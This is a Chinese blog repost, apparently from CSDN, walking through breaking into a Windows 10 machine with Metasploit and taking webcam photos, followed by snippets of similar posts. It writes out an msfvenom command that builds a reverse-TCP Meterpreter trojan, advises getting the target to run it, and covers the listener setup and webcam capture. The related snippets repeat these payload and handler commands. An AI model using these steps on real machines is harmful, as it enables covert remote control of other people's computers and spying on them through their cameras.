记一次msf入侵win10,并拍照

最新推荐文章于 2024-08-19 14:11:59 发布
最新推荐文章于 2024-08-19 14:11:59 发布
阅读量2.8k 收藏 23
点赞数 6
文章标签: shell 操作系统
原文链接:http://www.cnblogs.com/lanyincao/p/10884442.html
版权

    好久没有玩kali了,刚才看到一位大佬msf渗透win10的思路,我感觉不错,我就来复现一下

 

kali :192.168.45.136

win10 : 192.168.45.137

 

1  首先,我们查看一下kali的ip

 

 

 

2  生成 远控马儿  最后跟着生成马儿的路径

msfvenom -platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.45.136  LPROT=4444 EXITFUNC=thread -b '\x00' -f exe-only -o this_my_payload.exe

 

 

3   通过各种技术,传马儿到电脑

 

 

4 回到kali ,打开msfconsole

 

 

 

5   利用kali集成的模块来

用show options来查看需要设置什么

 

 

LHOST是kali的ip,LPORT是kali要侦听的端口

 

 

 

6 . 设置好了,开始exploit

 

7. 通过你的技术,让对方运行马儿,就可以获得权限了,如果出现乱码, 把终端改成GBK就行

 

8  查看摄像头类型和拍照

 

 

这个是我的个人电脑,本文章仅供学习,请遵守法律

原文章 :https://bbs.pediy.com/thread-251064.htm

转载于:https://www.cnblogs.com/lanyincao/p/10884442.html

weixin_30765577
关注
msf win10漏洞_渗透测试 - 黑客技术 | win10内存执行meterpreter绕过杀软第二弹_吾爱漏洞...
weixin_40007804的博客
12-22 957
坎宁汉姆的定律是这样的:“在互联网上获得正确答案的最好方法并不是去问一个问题,而是发布一个错误的答案”。然而,自从我发布上篇博文《win10内存花式执行meterpreter绕过杀软》后却没有收到负面反馈,不过我自己已经发现了一些问题:以下是我目前为止发现的:l绝大多数杀软使用默认配置就能检测到nps_payload,因为它在后端使用了msfvenom来生成可执行的powershell代码。l从w...
kali攻击命令大全_利用msf攻击win10
热门推荐
weixin_35513543的博客
11-27 1万+
攻击环境:攻击者系统:虚拟机下kali linux靶机系统:win10(需要打开Easy File Sharing服务)攻击者ip:10.3.134.27靶机ip:10.3.37.56攻击者和靶机在同一个wifi下,保证在同一网段里,能互相ping通。漏洞利用:EsayFileSharing注意点: 攻击者的虚拟机网络模式应选择桥接模式。准备工作完成,可以开始内网渗透之旅了。step-1首先我们先...
Kali利用msf渗透Windows电脑(超详细)
最新发布
Galaxy_0的博客
08-19 1133
msfvenom a Metasploit standalone payload generator,Also a replacement for msfpayload and msfencode.是用来生成后门的软件。MSFvenom是Msfpayload和Msfencode的组合,将这两个工具都放在一个Framework实例中。自2015年6月8日起,msfvenom替换了msfpayload和msfencode。
通过msf渗透win10
qq_63651088的博客
03-22 1631
提前将kali设置成桥接模式,与win10在同一个网段下。将payload.exe文件发送至win10下。还有更多利用方式,可自行探索。
msf win10系统攻击
WEB渗透测试 从入门到萌新
10-02 4780
win10系统攻击msf
Win10msf渗透测试,简单粗暴
m0_72774428的博客
10-22 939
因为视频太模糊了,所以我视频放网盘了 https://pan.baidu.com/s/1UFo0-llksGWHEK8s47EjbQ 密码fce8 第一步制作一个Win10的木马,代码:sudo msfvenom -p windows/meterpreter/reverse_tcpsudo -o 路径 第二步打开msf:打开监听:use exploit/multi/handler 然后设置木马:set payload windows/meterpreter/reverse_tcp 然
一次msf渗透win10
m0_46373658的博客
11-06 2472
KALI IP 192.168.186.141 WIN 10 192.168.186.131 生成木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=1234 -f exe -o payload.exe LHOST 本地的IP地址 LPORT 反向连接到主机的端口 打开 msfconsole use exploit/multi/handler 设置模块 set payload windows/meterp
利用msf入侵电脑
weixin_44761350的博客
05-25 1249
msf
使用MSF渗透攻击win7主机并远程执行命令
weixin_43991459的博客
06-15 3187
Win7 网络连接检查命令: Linux下: auxiliary是辅助模块用命令找寻关于ms17_010 的可运行模块用 指令,调用模块进行扫描,侦察靶机是否具备被攻击的条件通过 查看需要配置的参数,并用set进行配置,后面显示yes的必须设置若为【-】 以上说明已经打了改漏洞的补丁 刚才这个过程,是通过辅助模块探测目标主机的系统是否存在该漏洞。 下图的目标主机存在该漏洞 设置完成后出现【+】表示可以入侵 水印遮挡内容为: 开始加载使用入侵模块,进行入侵使用 指令查看可以使用的攻击载荷 若失败将靶机
Msf攻击Win7
07-09
Msf攻击Win7】指的是使用Metasploit框架对Windows 7系统进行渗透测试或漏洞利用的过程。Metasploit是一款开源的安全漏洞检测工具,广泛应用于安全研究、渗透测试和教育领域。它包含了大量的exploits(漏洞利用代码...
msfconsole攻击win10及简陋版
极客云曦前端
05-29 348
该错误提示表明在Metasploit中执行“shell”命令需要加载“stdapi”扩展。这可能是由于Metasploit架缺少所需的依赖库或文件。接下来把木马复制到 /var/www/html下 开启 service apache2 start 即可下载,需要做免杀不然是保存不下来的。在win10 浏览器 输入192.168.1.19/muma.exe。输入 load stdapi 即可解决 需要在肉机 执行 生成的木马。kali 攻击机IP 192.168.1.19。再打开msfconsole。
msf利用web_delivery模块 攻击windows实例
cuteyann的博客
05-15 656
目标机存在命令注入漏洞,使用web_delivery模块生成的一条命令建立连接,并且不会在目标主机磁盘写文件,留下文件信息。7、在复制的命令前添加127.0.0.1 && (因为&&命令执行),然后在dvwa命令注入靶场中提交。这里使用比较老的python做webshell就可以了,输入命令:set target 0。(在目标机的cmd也可执行,前提是目标机已经安装了python)8、查看session,然后连接,就可用对目标机进行操作啦。红框里就是生成的命令,把它复制下来。6、运行,输入命令:run。
2021-05-07 使用metasploit(MSF) 和 木马 入侵win10 虚拟机
White_give_boy的博客
05-07 1460
使用metasploit(MSF) 和 木马 入侵win10 0x01 实验环境 攻击机:kali linux ip:192.168.171.128 目标机:windows 10 家庭普通版 ip:物理主机 0x02配置msf 1.开启数据库服务 service postgresql start 2.初始化数据库 msfdb init 3.进入msf 4. 加载模块,显示参数 5. 修改参数 LHOST为攻击机ip,LPORT为监听端口 6.开始监...
msf win10漏洞_微软SMBv3 Client/Server远程代码执行漏洞CVE20200796
weixin_42659196的博客
01-06 455
01影响范围影响范围: Windows 10 Version 1903 for 32-bit Systems Windows 10 Version 1903 for x64-based Systems Windows 10 Version 1903 for ARM64-based Systems Windows Server, Version 1903 (Server Core inst...
badusb攻击windows10(msfconsole版)
algae
04-27 1457
准备badusbArduino下载软件点击下载运行软件TIM截图20190305105048.png在工具菜单中 选择,选择badusb的端口和开发版。TIM截图20190304122136.png注入代码windows10系统#include <Keyboard.h> void setup() { Keyboard.begin();//开始...
Mybatis接口Mapper内的方法为啥不能重载吗?
程序员麦冬的博客(公众号同名)
09-14 298
动态代理的功能:通过拦截器方法回调,对目标target方法进行增强。 言外之意就是为了增强目标target方法。上面这句话没错,但也不要认为它就是真理,殊不知,动态代理还有投鞭断流的霸权,连目标target都不要的科幻模式。 注:本文默认认为,读者对动态代理的原理是理解的,如果不明白target的含义,难以看懂本篇文章,建议先理解动态代理。 1. 自定义JDK动态代理之投鞭断流实现自动映射器Mapper 首先定义一个pojo。 public class User { private Integer id
msf攻击windows实例
qq_52712762的博客
05-30 1624
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
使用metasploit(MSF)对windows的ms08-067漏洞进行利用的过程
D-river博客
10-11 9756
metasploit比较经典的使用实例,ms08-067 netapi
msf永恒之蓝攻击win10
09-01
然而,永恒之蓝攻击模块(`ms17_010_eternalblue`)并不直接支持对Windows 10系统的攻击。永恒之蓝主要是针对Windows 7和Windows Server 2008 R2系统进行攻击的。 如果你想在Metasploit Framework中使用永恒之蓝攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值